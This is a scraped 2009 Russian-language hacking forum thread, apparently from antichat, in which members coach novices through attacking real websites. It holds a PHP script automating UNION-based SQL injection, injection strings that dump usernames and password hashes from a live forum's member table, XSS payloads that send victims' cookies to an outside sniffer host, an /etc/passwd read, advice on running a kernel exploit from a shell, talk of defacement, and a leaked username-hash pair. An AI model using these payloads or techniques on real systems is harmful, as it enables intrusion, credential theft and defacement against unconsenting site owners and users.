.:[melkiy]:.
05.04.2009, 18:54
Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
.:[melkiy]:. нет, либо утилитами,очень редко на сайте где уязвимость выводятся вся инфа без использования лимита
2 Gorev
А какже group_concat()
я только этим и пользуюсь
laedafess
05.04.2009, 19:45
group_concat выводит, правда не все, а насколько хватит места в поле
DimOnOID
05.04.2009, 19:48
2 Gorev
А какже group_concat()
я только этим и пользуюсь
group_concat() НЕ вывод всё....он огранич значением в group_concat_max_len.Так же он вроде бы не поддерживает лимит.
Если после ввода такой конструкции site.ru/index.asp?id=2'
Вылезла ошибка :
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark before the character string ''.
Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще...
laedafess
05.04.2009, 20:24
возможно:)
тогда path = http://abc.ru/a.htm
осталось найти трехбуквенник ру
я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий...
з.ы.
но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
-m0rgan-
05.04.2009, 22:34
:.']Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
Сам вчера распрашивал знакомых по дному вопросу...
Кароче ответ таков:
Мускул здесь нипричём, дело в скрипте, если скрипт не поддержует многостроковый вывод, то никак, но зато для автоматизации перебора через лимит написано множество скриптов. Вот один из них:
<?
#Скрипт для перебора значений limit в sql injection
set_time_limit(0);
error_reporting(0);
#В примере: 0x7C - соответствует символу "|", вместе с символом разделителем 0x3a получается запрос, ограниченный "|:" и ":|"
$n="|:"; #начало искомой
$n2=":|"; #конец искомой
$j=0; #парсить с
$lim=0; #до (0 - если до конца)
function get_page($url){ #получение страницы
$link=parse_url($url);
$host = $link['host'];
$src = $link['path'];
$src .= ($link['query'] > "")?"?".$link['query']:"";
$sock = fsockopen ($host, 80);
fputs ($sock, "GET /$sr<-b>c HTTP/1.0\r\nHost: $host\r\n\r\n");
$cont = "";
while (!feof ($sock)) { $cont .= fgets ($sock); }
fclose ($sock);
return $cont;
}
for($i=$j;($lim != 0) ? $i<$lim : 1 != 0;$i++){ #получение данных
$url="http://www.site.com/products.php?category_id=-1+union+select+1,2,concat_ws(0x3a,0x7c,table_name, column_name,0x7c),4+from+information_schema.column s+limit+$i,1/*"; #ссылка
$page=get_page($url);
$page=strip_tags($page);
$pos=stripos($page,$n);
$pos2=stripos($page,$n2,($pos+1));
if($pos == ""){echo "\n Current value - $i"; break;}
$page=substr($page,($pos+strlen($n)),($pos2-$pos-strlen($n2)));
$page .="\n";
echo $page;
$r=fopen('out.txt','a+'); #сохранение в файл
fputs($r,$page);
fclose($r);
}
?>
// Вроде бы правила ответа на вопрос не нарушел...
Pashkela
05.04.2009, 22:53
group_concat
Но тоже частями, но побольше, побольше
ЗЫЖ Для тех, кто думает, что через груп-конкат нельзя вывести всё абсолютно, вспомните про знаки ">" и "<" и подзапросы, и не парьте мне мозг своими оценками:)
-m0rgan-
05.04.2009, 23:26
Если после ввода такой конструкции site.ru/index.asp?id=2'
Вылезла ошибка :
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark before the character string ''.
Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще...
https://forum.antichat.ru/thread30501.html
-m0rgan-
05.04.2009, 23:32
dllerk, ошибка вызвана каким то твоим действием, или просто висела на странице??
никаких действий.. просто там одна буква недотягивает
Всем привет, есть эксплойт для линукса
http://www.milw0rm.com/exploits/7405
Как его использовать? сохранять в текстовом файле?
есть доступ через шелл на сайт, как вот использовать эксплойт ? куда загружать?
2 joomler
Сохраняешь в файле с расширением blabla.c и компилируешь под linux-ом
gcc -o blabla blabla.c
тока енто ж вродь DoS експлоит он тебе root не даст
тока енто ж вродь DoS експлоит он тебе root не даст
так и есть
allows local users to cause a denial of service (kernel infinite loop)
ну может он хочет серв уложить))
-m0rgan-
06.04.2009, 15:59
никаких действий.. просто там одна буква недотягивает
Если никаких действий - то это косяк кодера который писал двиг...Из этого можно извлеч лиш пути...
Если никаких действий - то это косяк кодера который писал двиг...Из этого можно извлеч лиш пути...
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark before the character string ''.
Нука скажи ка мне путь ...
-m0rgan-
06.04.2009, 16:16
slider, это был ответ на другой вопрос, смотри внимательнее!
Ответ был на вопрос:
Что можно с этим сделать?
http://qqqq.110mb.com/x.jpg
как то так...
нашел на сайте вроде активную xss, в поисковике . никак не могу понять , kak применять ?делал все по forum.antichat.ru/thread20140.html а вот kak подставить к ссылке никак не понимаю.
сайт не хочу пока что давать.
-m0rgan-
06.04.2009, 16:50
Если XSS активная - то не надо никакую ядовитую ссылку кидать, яваскрипт выполнится автоматически при заходе на страницу!
нашел на сайте вроде активную xss, в поисковике . никак не могу понять , kak применять ?делал все по forum.antichat.ru/thread20140.html а вот kak подставить к ссылке никак не понимаю.
сайт не хочу пока что давать.
вероятно это пассивная xss: куки почисти. (или открой в альтернативном браузере)- если твой код не срабатывает (хотя тут еще и от браузера зависит) то скорее всего это пассивная XSS
глянь исходник странички может что интересное найдешь.
-m0rgan-
06.04.2009, 17:10
Saiga, если пасивка, то кидаешь с линком что то типа:
<script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
да в принципе если и активка, то этот вариант подойдёт ;)
цитата ниженаписанного:
как я понял из его вопроса он не может сформировать правильный линк...
...а вот kak подставить к ссылке никак не понимаю. сайт не хочу пока что давать.
без линка сложно будет помочь...
Иногда линк формируется примерно так:
http://site.com/blablabla.php"><script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
Ну это лишь один из случаев...
я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий...
з.ы.
но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
3 буквы ру стоят 1 бакс
http://www.drupal.ru/node/26048
Saiga, если пасивка, то кидаешь с линком что то типа:
<script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
да в принципе если и активка, то этот вариант подойдёт ;)
как я понял из его вопроса он не может сформировать правильный линк... так что не надо меня пугать jokester"om :D ми нисколько не боится.
PS jokester, ты всех тут запугал :(
http://www.toidutare.ee//retsept.php?otsi=1
<scr_ipt>im*g=new Image();im*g.src="http://sniffer.xaknet.ru/userbars/img_4_551.gi*f?"+document.cookie;</scri_pt>
что то такое ? но на сниффере , самого меня показывает ))
это пассивка , спс за помощь
massovka
06.04.2009, 18:15
Привет всем ребята помогите
Нашел сайтик что мне нужно! сделал sql-inj
Узнал
Версия версия СУБД (базы данных) - 5.0.45
пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?
,load_file(0x2f6574632f706173737764)
load_file(/etc/passwd/)
И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю
Значит не судьба, если нужен так именно этот сайт, попробуй поискать баги у "соседей".
-m0rgan-
06.04.2009, 18:23
http://www.toidutare.ee//retsept.php?otsi=1
Сиега, пихаешь в уязвимое поле свой яваскрипт, например "><script>alert()</script> и смотри в адресную строку:
http://www.toidutare.ee//retsept.php?otsi=1&string=&string2=&string3=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript% 3E&liik=
Этот линк и кидать, с другими даннымы разумеется...
Pashkela
06.04.2009, 18:25
Привет всем ребята помогите
Нашел сайтик что мне нужно! сделал sql-inj
Узнал
Версия версия СУБД (базы данных) - 5.0.45
пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?
,load_file(0x2f6574632f706173737764)
load_file(/etc/passwd/)
И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю
Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь:
union+select+table_name+from+information_schema.ta bles
Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь:
union+select+table_name+from+information_schema.ta bles
Скорее всего он таблицы называет полями.
massovka
06.04.2009, 18:38
information_schema.tables вот тут смотрю все 115 полей посмотрел ничего нет ставил стандартные название ничего пусто
massovka
06.04.2009, 18:39
+information_schema.tables+limit+14,1--+
massovka
06.04.2009, 18:55
вот так листаю все но ничего нет
AkyHa_MaTaTa
06.04.2009, 19:04
попробуй например так :
concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME)+from+INFORMATION_SCHEMA.COLUMNS+where+table_ schema+not+in+(0x696e666f726d6174696f6e5f736368656 d61)+limit+0,1--+
massovka
06.04.2009, 19:51
index.php?showtopic=-24435+union+select+1,table_name,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28+from+information_schema.tables+limit+14,1--+
Подскажите как подставить concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME)+from+INFORMATION_SCHEMA.COLUMNS+where+table_ schema+not+in+(0x696e666f726d6174696f6e5f736368656 d61)+limit+0,1--+
в мою линк
Pashkela
06.04.2009, 19:56
:D :D :D вместо table_name засунь это:
concat(table_schema,0x2E,table_name,0x3D3E,COLUMN_ NAME)
вместо information_schema.tables+limit+14,1 засунь это:
INFORMATION_SCHEMA.COLUMNS+where+table_ schema+not+in+(0x696e666f726d6174696f6e5f736368656 d61)+limit+0,1
massovka
06.04.2009, 20:00
SELECT * FROM ibf_topics WHERE tid = -24435 union select 1,concat(table_schema,0x2E,table_name,0x3D3E,COLUM N_ NAME),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28 from INFORMATION_SCHEMA.COLUMNS where table_ schema not in (0x696e666f726d6174696f6e5f736368656 d61) limit 0,1 ORDER BY last_post DESC LIMIT 0,1 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'NAME),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28 f' at line 1
вот что пишет :(
Pashkela
06.04.2009, 20:03
COLUMN_ NAME
Убери форумные пробелы. Видишь же, даже в твоей мессаги появляются пробелы, которых не было вообще-то
Jokester
06.04.2009, 20:04
massovka
Давай линк, или иди почитай статьи. Какой смысл тупо пихать то , что тебе дали, даже не понимая зачем это?
Ты пробелы не убрал (если тебе это о чём-то говорит)
2 xcedz я тебя вижу, бойся меня :)
massovka
06.04.2009, 20:08
я кинул тебе в личку
massovka
06.04.2009, 20:20
index.php?showtopic=-24435+union+select+1,table_name,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28+from+information_schema.tables+limit+14,1--+
Вот моя сылка просматрюю все поля ничего про user password ничего нет
Jokester
06.04.2009, 20:24
Может ты ПМ прочитаешь? Или так и будешь писать сюда?
massovka
06.04.2009, 20:34
Вем спасибо jokester помог мне!
massovka
07.04.2009, 10:10
Доброе утро всем! Подскажите еще на один вопрос! Какой командой можно вывести все юзеров и хэш! Спасибо
concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+limit+0, 100/*
у меня ща так
и шо тебе не нравится? тама же лимит ничо не сделаешь! юзай SIPT он тебе по бистрому все достанет!
group_concat(name,0x3a3a,member_login_key) без лимита.Вроде первую 1000 знаков (если ошибаюсь-поправьте).
читай тему, всё расписано.За один запрос всех не выведешь всё равно (если их много), только частями или по опр. параметрам.
И в limit+0,100/* -сотня не нужна, достаточно единицы
0,1/*-дальше перебирай 1,1 -2,1 -3,1 -4,1 если просто через concat.
А вообще действительно-юзай сипт.
massovka
07.04.2009, 10:37
Может я наглый очень! А как можно сделать так чтоб таблице вывелось а не одним рядком!?
DrAssault
07.04.2009, 11:43
Может я наглый очень! А как можно сделать так чтоб таблице вывелось а не одним рядком!?
Никак нах...
massovka
07.04.2009, 12:08
Nikmurder::8593e40f18a60bf0b3379d41a47f4481 Скажите это MD5 hashes?
с чем связано то что
passwordsPro не находит пароль который должен был бы бесспорно найти ?
даю ему хеш пароля от mysql версии 5 стоящей у меня на комп.е , выбираю тип хеша mysql5 , и ничего . не находит . даже маску легкую задаю , и все равно не находит
DrAssault
07.04.2009, 12:37
с чем связано то что
passwordsPro не находит пароль который должен был бы бесспорно найти ?
даю ему хеш пароля от mysql версии 5 стоящей у меня на комп.е , выбираю тип хеша mysql5 , и ничего . не находит . даже маску легкую задаю , и все равно не находит
Вероятно ты что то неправильно делаешь, во первых скажи как брутишь, т.е. каким способом???( словарь, полный перебор, атака по маске, атака по райнбоу-таблицам и т.п.) отсюда и будем отталкиваться...
Вероятно ты что то неправильно делаешь, во первых скажи как брутишь, т.е. каким способом???( словарь, полный перебор, атака по маске, атака по райнбоу-таблицам и т.п.) отсюда и будем отталкиваться...
и по полному перебору пробовал,
и по маске
Jokester
07.04.2009, 12:51
Может я наглый очень! А как можно сделать так чтоб таблице вывелось а не одним рядком!?
1,group_concat(concat_ws(0x3a,name,member_login_ke y)+separator+0x0a),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28+from+ibf_m embers--+
Далее, я тебе просто показал таблицу, не факт , что там не солёные хеши, просмотри ВСЕ столбцы, возможно в базе есть соль, возможно там двойной MD5, или просто генерённые пароли, тогда вероятность брута приближается к нулю.(это по поводу перебора)
И ещё раз настоятельно рекоммендую почитать статьи по скулям, все станет гораздо прощё.
PS
Никак нах...
Я же вроде просил, если не уверен не отвечать.
Да ещё так категорично.
DrAssault
07.04.2009, 13:13
Я же вроде просил, если не уверен не отвечать.
Да ещё так категорично.
jokester group_concat это само собой, причем тут вся таблица? Он просил вывести именно таблицу (насколько я понял, претензии по этому поводу не ко мне, попроси лучьше новичков вопросы поясней как то задавать что ли, почему то я более чем уверен, что он имелл ввиду именно, чтобы вывод был всей таблицы, гг так ещё и с рамками ёпт)!!!
насчет моей проблемы
...дайте на худой конец хоть линки к соотв. темам форума
Shaitan-Devil
07.04.2009, 14:10
jokester group_concat это само собой, причем тут вся таблица? Он просил вывести именно таблицу (насколько я понял, претензии по этому поводу не ко мне, попроси лучьше новичков вопросы поясней как то задавать что ли, почему то я более чем уверен, что он имелл ввиду именно, чтобы вывод был всей таблицы, гг так ещё и с рамками ёпт)!!!
Как раз вопрос был ясен=\. Имхо jokester прав Только у group_concat() есть минус в том, что выводить можно не больше 1024 знаков.
П.С. Сорри за оффтоп.
Jokester
07.04.2009, 14:12
насчет моей проблемы
...дайте на худой конец хоть линки к соотв. темам форума
Ты просто не в тот раздел обратился. Попробуй сюда:
https://forum.antichat.ru/forum76.html
карта раздела
https://forum.antichat.ru/thread76958.html
форум самой программы
http://forum.insidepro.com/viewforum.php?f=8
У меня лично отлично всё находит и перебирает, если всё делать правильно
massovka
07.04.2009, 20:09
Может я наглый очень! А как можно сделать так чтоб таблице вывелось а не одним рядком!?
А кто знает как можно вывести хэш одного usera и базы очень нужно! Ник юзера знаю
concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+limit+0, 2/*
massovka
concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+na me=NICK/*
Где NICK - это ник того кого ты хочешь вывести... вроде так если не ошибаюсь!
p.s. пробелов там нет =)
ph1l1ster
07.04.2009, 20:53
where+name='NICK'
так лучше. если с ошибкой то NICK в хексе и без кавычек.
massovka
07.04.2009, 20:56
massovka
concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+na me=NICK/*
Где NICK - это ник того кого ты хочешь вывести... вроде так если не ошибаюсь!
p.s. пробелов там нет =)
Вот что пише
Unknown column 'bybyby' in 'where clause
massovka
07.04.2009, 21:00
where+name='NICK'
так лучше. если с ошибкой то NICK в хексе и без кавычек.
/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_k ey),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+na me=0x627962796279/*
Ответ пусто
massovka
07.04.2009, 21:04
/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_k ey),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+na me=0x627962796279/*
Ответ пусто
Получилось увидел! Но возник 2 вопрос того кого я ищу нет! Но я точно знаю что такой юзер есть я сегодня его сам зарегистрировал! Может он вдругой базе? или как?
ph1l1ster
07.04.2009, 21:07
massovka, попобуй поищи по id, может у тебягде ошибка проверяй внимательней!
massovka
07.04.2009, 21:22
massovka, попобуй поищи по id, может у тебягде ошибка проверяй внимательней!
Masterok 0x4d61737465726f6b
SpideR 0x537069646552
В базе порядка 1000 юзеров я вот взял те которые выше перевел как вы сказали! нахожу их без проблем
Сегодня днем зарегил bybyby(захожу по дним на сайте он есть 100%) ищу его как мне сказали выше ПУСТО
Проблема втом что у меня есть хэш всех юзеров я вчера до 5 утра начал перебирать http://hash.insidepro.com/index.php вот в этой базе! из 300 человек ни одного стндартного паролья Я В ШОКЕ!
Вот и зарегил сегодня bybyby посмотреть как он шыфруется!
и вот трабл его не могу в базе найти! Может там еще база с юзерами есть?
wildshaman
07.04.2009, 21:25
Проблема втом что у меня есть хэш всех юзеров я вчера до 5 утра начал перебирать http://hash.insidepro.com/index.php вот в этой базе! из 300 человек ни одного стндартного паролья Я В ШОКЕ!
Уверен, что там мд5?
Если он, то уверен, что там не двойное шифрование?
ph1l1ster
07.04.2009, 21:44
massovka, md5(md5(salt)md5(pass))
massovka
07.04.2009, 22:42
Уверен, что там мд5?
Если он, то уверен, что там не двойное шифрование?
Sofiya::659a4ba8be228cf0d54db65a213cf1fe
вот один из примеров! А так как я новичек незнаю двойной или не двойной он кто подскажет тому спасибо
ph1l1ster
07.04.2009, 22:46
Sofiya::659a4ba8be228cf0d54db65a213cf1fe
вот один из примеров! А так как я новичек незнаю двойной или не двойной он кто подскажет тому спасибо
какая версия ipb?
1 - md5($pass)
2 - md5(md5($salt).md5($pass))
massovka
07.04.2009, 23:11
какая версия ipb?
- 5.0.45
1 - md5($pass)
2 - md5(md5($salt).md5($pass))
- 5.0.45
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot